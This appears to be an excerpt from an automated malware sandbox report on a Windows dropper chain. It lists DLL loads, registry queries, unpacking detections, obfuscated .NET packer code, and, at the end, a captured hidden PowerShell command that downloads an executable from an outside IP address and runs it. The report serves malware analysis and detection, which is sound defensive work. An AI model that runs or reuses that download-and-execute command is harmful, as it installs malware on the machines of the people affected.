Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DhqvS8pXj8.exe

Static file information: File size 2142208 > 1048576

Source: DhqvS8pXj8.exe

Static PE information: Raw size of fsnlaalu is bigger than: 0x100000 < 0x19f200

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447686748.0000000000692000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: protobuf-net.pdb source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Unpacked PE file: 0.2.DhqvS8pXj8.exe.2c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fsnlaalu:EW;pycumdux:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Unpacked PE file: 23.2.TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hrrnbomn:EW;cbgcjyrp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Unpacked PE file: 46.2.483d2fa8a0d53818306efeb32d3.exe.510000.0.unpack :EW;.rsrc:W;.idata :W; :EW;epptfshe:EW;zgobaftm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;epptfshe:EW;zgobaftm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Unpacked PE file: 64.2.TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE.dc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hrrnbomn:EW;cbgcjyrp:EW;.taggant:EW; vs :ER;.rsrc:W;

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	.Net Code: RQsQTTbUYeEtZ5KVMrb(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{RQsQTTbUYeEtZ5KVMrb(typeof(IntPtr).TypeHandle),RQsQTTbUYeEtZ5KVMrb(typeof(Type).TypeHandle)})
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: k6Sly2p.exe.6.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p.exe.6.dr, -.cs	.Net Code: _0001 System.AppDomain.Load(byte[])
Source: k6Sly2p[1].exe.6.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p[1].exe.6.dr, -.cs	.Net Code: _0001 System.AppDomain.Load(byte[])
Source: k6Sly2p.exe0.6.dr, -.cs	.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
Source: k6Sly2p.exe0.6.dr, -.cs	.Net Code: _0001 System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
